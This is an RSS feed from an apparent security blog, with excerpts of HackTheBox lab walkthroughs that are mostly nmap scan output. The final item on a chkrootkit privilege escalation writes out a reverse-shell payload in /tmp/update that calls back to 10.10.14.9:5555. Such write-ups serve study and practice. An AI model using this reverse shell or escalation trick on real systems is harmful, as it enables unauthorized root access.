<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Linux Machines on rchitect</title><link>https://www.rchitect.in/tags/linux-machines/</link><description>Recent content in Linux Machines on rchitect</description><generator>Hugo</generator><language>en</language><lastBuildDate>Fri, 13 May 2022 00:00:00 +0000</lastBuildDate><atom:link href="https://www.rchitect.in/tags/linux-machines/index.xml" rel="self" type="application/rss+xml"/><item><title>Hackthebox Knife</title><link>https://www.rchitect.in/posts/htb-knife/</link><pubDate>Fri, 13 May 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-knife/</guid><description>&lt;h1 id="hackthebox-knife-walkthrough"&gt;
 Hackthebox Knife Walkthrough
 &lt;a class="heading-link" href="#hackthebox-knife-walkthrough"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;h5 id="initial-enumeration"&gt;
 Initial Enumeration
 &lt;a class="heading-link" href="#initial-enumeration"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h5&gt;
&lt;h6 id="port-scan"&gt;
 Port Scan
 &lt;a class="heading-link" href="#port-scan"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h6&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;sudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.10.10.242
sudo nmap -sU -p- -Pn -T4 --min-rate 10000 -oN alludp.txt 10.10.10.242
[sudo] password for rocky: 
Host discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-12 20:19 EDT
Nmap scan report for 10.10.10.242
Host is up (0.066s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 7.57 seconds
Host discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-12 20:19 EDT
Warning: 10.10.10.242 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.242
Host is up (0.049s latency).
All 65535 scanned ports on 10.10.10.242 are open|filtered (65483) or closed (52)

Nmap done: 1 IP address (1 host up) scanned in 46.51 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;h6 id="vulnarabilty-scan"&gt;
 Vulnerability Scan
 &lt;a class="heading-link" href="#vulnarabilty-scan"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h6&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt; nmap -Pn -p 22,80 -sC -sV -oN details.txt 10.10.10.242
Host discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-05-12 20:41 EDT
Nmap scan report for 10.10.10.242
Host is up (0.044s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.49 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;h6 id="directory-scan"&gt;
 Directory Scan
 &lt;a class="heading-link" href="#directory-scan"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h6&gt;
&lt;p&gt;Website Front end:&lt;/p&gt;</description></item><item><title>Hackthebox Jarvis</title><link>https://www.rchitect.in/posts/htb-jarvis/</link><pubDate>Mon, 25 Apr 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-jarvis/</guid><description>&lt;p&gt;This post is about the Walkthrough of the hackthebox machine: Jarvis&lt;/p&gt;</description></item><item><title>Hackthebox Brainfuck</title><link>https://www.rchitect.in/posts/htb-brainfuck/</link><pubDate>Thu, 14 Apr 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-brainfuck/</guid><description>&lt;h1 id="hackthebox-brainfuck-walkthrough"&gt;
 Hackthebox Brainfuck Walkthrough
 &lt;a class="heading-link" href="#hackthebox-brainfuck-walkthrough"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;&lt;img src="https://www.rchitect.in/images/walk/brainfuck/1.png" alt="brainfuck"&gt;&lt;/p&gt;
&lt;h3 id="initial-enumeration"&gt;
 Initial Enumeration
 &lt;a class="heading-link" href="#initial-enumeration"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h3&gt;
&lt;h4 id="port-scan"&gt;
 Port Scan
 &lt;a class="heading-link" href="#port-scan"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h4&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;sudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.10.10.17
[sudo] password for rocky: 
Host discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-07 21:40 EDT
Nmap scan report for 10.10.10.17
Host is up (0.051s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
110/tcp open pop3
143/tcp open imap
443/tcp open https


$ sudo nmap -sU -p- -Pn -T4 --min-rate 10000 -oN alludp.txt 10.10.10.17
Host discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-07 21:41 EDT
Nmap scan report for 10.10.10.17
Host is up (0.045s latency).
Not shown: 65532 open|filtered ports
PORT STATE SERVICE
110/udp closed pop3
143/udp closed imap
443/udp closed https
&lt;/code&gt;&lt;/pre&gt;&lt;h5 id="vulnarability-scan"&gt;
 Vulnerability Scan
 &lt;a class="heading-link" href="#vulnarability-scan"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h5&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;$ nmap -Pn -p 22,25,110,143,443 -sC -sV -oN details.txt 10.10.10.17
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-07 21:43 EDT
Nmap scan report for 10.10.10.17
Host is up (0.042s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 94:d0:b3:34:e9:a5:37:c5:ac:b9:80:df:2a:54:a5:f0 (RSA)
| 256 6b:d5:dc:15:3a:66:7a:f4:19:91:5d:73:85:b2:4c:b2 (ECDSA)
|_ 256 23:f5:a3:33:33:9d:76:d5:f2:ea:69:71:e3:4e:8e:02 (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: brainfuck, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: CAPA RESP-CODES USER AUTH-RESP-CODE TOP SASL(PLAIN) PIPELINING UIDL
143/tcp open imap Dovecot imapd
|_imap-capabilities: ID LOGIN-REFERRALS more AUTH=PLAINA0001 have listed LITERAL+ capabilities IMAP4rev1 post-login Pre-login SASL-IR OK IDLE ENABLE
443/tcp open ssl/http nginx 1.10.0 (Ubuntu)
|_http-server-header: nginx/1.10.0 (Ubuntu)
|_http-title: Welcome to nginx!
| ssl-cert: Subject: commonName=brainfuck.htb/organizationName=Brainfuck Ltd./stateOrProvinceName=Attica/countryName=GR
| Subject Alternative Name: DNS:www.brainfuck.htb, DNS:sup3rs3cr3t.brainfuck.htb
| Not valid before: 2017-04-13T11:19:29
|_Not valid after: 2027-04-11T11:19:29
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_ http/1.1
| tls-nextprotoneg: 
|_ http/1.1
Service Info: Host: brainfuck; OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;There was a certificate warning on the HTTPS service. The site looks like below (it seems nginx is running).&lt;/p&gt;</description></item><item><title>Hackthebox Node</title><link>https://www.rchitect.in/posts/htb-node/</link><pubDate>Tue, 05 Apr 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-node/</guid><description>&lt;h1 id="hackthebox-node-walkthrough"&gt;
 Hackthebox Node Walkthrough
 &lt;a class="heading-link" href="#hackthebox-node-walkthrough"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;&lt;img src="https://www.rchitect.in/images/walk/node/1.png" alt="node"&gt;&lt;/p&gt;
&lt;h3 id="initial-enumeration"&gt;
 Initial Enumeration
 &lt;a class="heading-link" href="#initial-enumeration"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h3&gt;
&lt;h4 id="port-scan"&gt;
 Port Scan
 &lt;a class="heading-link" href="#port-scan"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h4&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;sudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.10.10.58
[sudo] password for rocky: 
Host discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-30 19:43 EDT
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 24.10% done; ETC: 19:43 (0:00:09 remaining)
Nmap scan report for 10.10.10.58
Host is up (0.049s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp

$ sudo nmap -sU -p- -Pn -T4 --min-rate 10000 -oN alludp.txt 10.10.10.58
Host discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-30 19:57 EDT
Nmap scan report for 10.10.10.58
Host is up.
All 65535 scanned ports on 10.10.10.58 are open|filtered
&lt;/code&gt;&lt;/pre&gt;&lt;h5 id="vulnarability-scan"&gt;
 Vulnerability Scan
 &lt;a class="heading-link" href="#vulnarability-scan"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h5&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;$ nmap -Pn -p 22,3000 -sC -sV -oN details.txt 10.10.10.58
Host discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-30 20:04 EDT
Nmap scan report for 10.10.10.58
Host is up (0.049s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-tasktracker Apache Hadoop
| hadoop-datanode-info: 
|_ Logs: /login
| hadoop-tasktracker-info: 
|_ Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;We can see 2 ports open, and on port 3000 an Apache service seems to be running. This is how the page looks on port 3000:&lt;/p&gt;</description></item><item><title>Hackthebox Tartarsauce</title><link>https://www.rchitect.in/posts/htb-tartar/</link><pubDate>Sat, 26 Mar 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-tartar/</guid><description>&lt;p&gt;This post is about the Walkthrough of the hackthebox machine: Tartarsauce&lt;/p&gt;</description></item><item><title>chkrootkit exploit for privilege escalation</title><link>https://www.rchitect.in/posts/chk-rootkit/</link><pubDate>Wed, 09 Mar 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/chk-rootkit/</guid><description>&lt;h1 id="chkrootkit-exploit"&gt;
 Chkrootkit Exploit
 &lt;a class="heading-link" href="#chkrootkit-exploit"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;I have tried pspy and I could see chkrootkit.&lt;/p&gt;
&lt;p&gt;Let's search for the exploit.&lt;/p&gt;
&lt;p&gt;As per this exploit, you create a file named &amp;ldquo;update&amp;rdquo; under /tmp.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;amrois@nineveh:/tmp$ printf &amp;#39;#!/bin/sh\n&amp;#39; &amp;gt; update
amrois@nineveh:/tmp$ printf &amp;#39;/bin/bash -c &amp;#34;/bin/bash -i &amp;gt; /dev/tcp/10.10.14.9/5555 0&amp;lt;&amp;amp;1&amp;#34;\n&amp;#39; &amp;gt;&amp;gt; update
amrois@nineveh:/tmp$ chmod +x update 
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Or you can use a heredoc (EOF) to replace the printf commands, like below.&lt;/p&gt;</description></item></channel></rss>